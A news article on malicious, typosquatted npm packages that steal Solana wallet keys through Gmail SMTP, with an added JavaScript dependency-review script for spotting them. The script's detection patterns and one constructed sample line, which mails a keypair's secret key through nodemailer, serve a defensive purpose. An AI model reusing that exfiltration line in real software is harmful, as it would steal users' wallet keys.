A new cyber attack targeting Solana crypto wallets has been uncovered, with Gmail being exploited as a key part of the attack strategy.
According to a Socket Threat Research Team report published on January 8, 2025, hackers are using malicious npm packages to steal Solana private keys and funnel them through Gmail’s email system, making it difficult for security systems to detect the threat.
The attack works by intercepting private keys during wallet interactions and sending them out through Gmail's SMTP servers. Traffic to those servers is typically trusted, so it often passes through firewalls or endpoint detection systems uninspected, which lets the hackers carry out their scheme without triggering alarms.
Gmail’s role in this attack is crucial, as it is a widely trusted platform. According to Kirill Boychenko, a threat intelligence analyst at Socket, the abuse of Gmail allows the attack to go undetected by many security systems that treat smtp.gmail.com as legitimate traffic.
In response to the report, Google confirmed that it is aware of this type of attack. A spokesperson stated that Gmail accounts have protections in place to detect suspicious behavior such as exfiltration and forwarding of data. If such activity is detected, users are prompted to reauthenticate to secure their accounts.
The report also highlights how AI-driven attacks are becoming more prevalent in cybercrime. Dmitry Volkov, CEO of Group-IB, explained that AI is being used to create more sophisticated scams, including phishing and malware attacks. AI-powered tools can even generate malicious code, making it easier for hackers to carry out large-scale attacks and bypass traditional defenses.
The malicious npm packages used in this attack were disguised as legitimate tools. One such package, @async-mutex/mutex, was a typosquatted version of a popular package with millions of downloads. The packages were designed to look harmless, but they contained malware that could steal private keys from users of Solana wallets.
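The two traits described above, a scoped package name that imitates a popular unscoped package and package code that reads wallet key material while opening an email channel to smtp.gmail.com, can be checked for in a dependency review. The following is an added example written for this article, not code from the Socket report or from the article itself. It assumes that @async-mutex/mutex imitates the unscoped async-mutex package, that the "popular packages" list is the project's own allow-list, and that the sample package sources are constructed for the example; the indicator patterns are illustrative and would be tuned per environment.

```javascript
// Added example (not from the Socket report or the article): a small
// dependency-review check that flags
//   (1) scoped package names that mimic a popular unscoped package
//       (e.g. @async-mutex/mutex imitating async-mutex), and
//   (2) package source that combines wallet-key access with an SMTP
//       exfiltration channel such as smtp.gmail.com.
// The popular-package list and the sample sources below are constructed.

// Constructed allow-list of well-known unscoped package names a project expects.
const POPULAR_PACKAGES = new Set(['async-mutex', 'lodash', 'express']);

// Indicators of an email-based outbound channel and of key-material access.
const SMTP_INDICATORS = [/smtp\.gmail\.com/i, /nodemailer/i, /createTransport\s*\(/i];
const KEY_INDICATORS = [/secretKey/i, /privateKey/i, /Keypair\.fromSecretKey/i];

// Returns the popular package a scoped name imitates, or null.
// Matches when the scope equals a popular name ("@async-mutex/mutex")
// or when the package part equals one ("@someone/lodash").
function typosquatOf(name) {
  const m = /^@([^/]+)\/([^/]+)$/.exec(name);
  if (!m) return null;
  const [, scope, pkg] = m;
  if (POPULAR_PACKAGES.has(scope)) return scope;
  if (POPULAR_PACKAGES.has(pkg)) return pkg;
  return null;
}

// Reviews one package (name plus its concatenated source text) and
// returns an array of human-readable findings; empty means nothing flagged.
function reviewPackage(name, source) {
  const findings = [];
  const squat = typosquatOf(name);
  if (squat) {
    findings.push(`name "${name}" imitates popular package "${squat}"`);
  }
  const hasSmtp = SMTP_INDICATORS.some((re) => re.test(source));
  const hasKeys = KEY_INDICATORS.some((re) => re.test(source));
  if (hasSmtp && hasKeys) {
    findings.push('source reads wallet key material and opens an SMTP channel');
  } else if (hasSmtp) {
    findings.push('source opens an SMTP channel (review intent)');
  }
  return findings;
}

// Reviews a dependency map {name: source} and returns {name: findings}
// for every package with at least one finding.
function reviewDependencies(deps) {
  const report = {};
  for (const [name, source] of Object.entries(deps)) {
    const findings = reviewPackage(name, source);
    if (findings.length > 0) report[name] = findings;
  }
  return report;
}

// Constructed sample inputs: one benign package, one that only sends mail
// (a legitimate notification helper, worth a look but not an alarm), and one
// that shows the pattern the report describes.
const SAMPLE_DEPS = {
  'async-mutex': 'class Mutex { acquire() {} }',
  'mailer-helper': "nodemailer.createTransport({ host: 'smtp.gmail.com' });",
  '@async-mutex/mutex':
    "const kp = Keypair.fromSecretKey(raw); " +
    "nodemailer.createTransport({ host: 'smtp.gmail.com' }).sendMail({ text: kp.secretKey });",
};

// Prints the review for the constructed sample when run directly.
console.log(JSON.stringify(reviewDependencies(SAMPLE_DEPS), null, 2));
```

Run with `node review.js`; a package that both imitates a popular name and pairs key access with an SMTP channel gets two findings, a package that only sends mail gets a single review-intent note, and the genuine async-mutex is not flagged at all. In a real pipeline the source text would come from the unpacked tarball (including install scripts) rather than from an inline string.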
At the time of the report, the malicious packages were still available for download, though researchers have petitioned for their removal. The threat actors behind this campaign have also used GitHub repositories to lend legitimacy to the malware.
This attack highlights the risks involved with trusting email platforms like Gmail, especially when they are exploited by hackers to exfiltrate sensitive data. Users of Solana wallets and other cryptocurrency platforms are urged to stay vigilant and ensure their accounts are secure, as these types of attacks continue to evolve.